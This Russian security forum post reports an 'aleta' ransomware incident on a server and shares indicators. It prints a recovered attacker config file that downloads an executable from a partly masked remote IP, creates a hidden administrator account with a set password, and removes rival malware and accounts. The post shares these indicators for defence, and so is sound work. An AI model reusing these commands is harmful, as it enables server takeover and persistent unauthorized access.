Перейти к содержанию
20 лет клубу! Куда отправится Kaspersky Club? Нажми, чтобы узнать локацию! ;)

информация по шифровальщику aleta

virus_alert
 Поделиться

Рекомендуемые сообщения

virus_alert

virus_alert

Опубликовано
Опубликовано

На одном из серверов, где не было антивируса, сработал шифровальщик aleta. Все данные в итоге удалось восстановить.

Из интересного был найден файл ok[1].txt в системном профиле C:\Windows\System32\config\systemprofile\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5

Ниже его содержимое, могу предположить, что это ip-адрес командного сервера злоумышленников.

 

[down]

h__p://118.xxx.xxx.141:8888/ppsa.jpg c:\windows\Loginsas.exe 1

[cmd]

net1 user IUSR_Servs ZxcvBMN,.1987&net1 user IUSR_Servs ZxcvBMN,.1987 /ad&net1 localgroup administrators IUSR_Servs /ad

net1 user IISUSER_ACCOUNTXX /del&net1 user IUSR_ADMIN /del&net1 user snt0454 /del&taskkill /f /im Logo1_.exe&del c:\windows\Logo1_.exe

del c:\windows\RichDllt.dll

taskkill /f /im netcore.exe&del c:\windows\netcore.exe&taskkill /f /im ygwmgo.exe&del c:\windows\ygwmgo.exe&net1 user aspnet /del&net1 user LOCAL_USER /del

echo 123>>1.txt

Гость
Эта тема закрыта для публикации ответов.
 Поделиться
Перейти к списку тем

  • Похожий контент

    • Alsus
      Зашифровано payday
      Автор Alsus
      При включении сервера зашифровались все файлы ( несистемные) .  Комп не перезагружали, сохранился скрипт, и программа шифровальщик. Высылаю логи, программу и скрипт, и зашифрованый файл
      CollectionLog-2017.11.16-12.57.zip
      Договор водоснаб населения.doc.helper05@cock.li-id-1080.rar
    • Diocese
      Вирус шифровальщик
      Автор Diocese
      Как лечить?
      CollectionLog-2017.10.16-10.53.zip
    • дирижабль
      Шифровальщик
      Автор дирижабль
      Доброго времени суток! Прошу о помощи,
       
      вирус-шифровальщик, файлы по регламенту в приложении. Скажите, пожалуйста, можно ли восстановить файлы, есть ли дешифратор?
      В приложении файл с требованием, пара зашифрованных файлов в архиве 1
       
      Спасибо!
      CollectionLog-2017.10.18-14.38.zip
      !! RETURN FILES !!.txt
      1.zip
    • tumb
      Шифровальщик PADAY
      Автор tumb
      Сегодня 18.10.2017 в 11:50 была произведена шифровка всех данных на сервере. Причем за ним никто не работает, он тихонько стоит себе в углу, но при этом подключен к интернету. Я уж не знаю каким образом могла произойти шифровка, на нем ничего не скачивалось и не открывалось. Помогите если возможно в дешифровке. Какую информацию предоставить для анализа?
    • percolant
      Криптолокер BTCware
      Автор percolant
      Здравствуйте,
      Есть ли возможность расшифровать сабж? В аттаче архив с четырьмя файлами: два зашифрованные + два чистые оригиналы. Большое спасибо.
×
×
  • Создать...